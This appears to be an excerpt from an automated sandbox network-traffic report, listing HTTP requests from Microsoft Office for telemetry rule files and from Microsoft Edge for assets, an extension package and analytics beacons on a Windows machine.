Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731389013838&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39559DFC669A689A222688C967CD69C0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731389013838&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39559DFC669A689A222688C967CD69C0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=15546d9e7161bb1576cd54f1731389016; XID=15546d9e7161bb1576cd54f1731389016
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
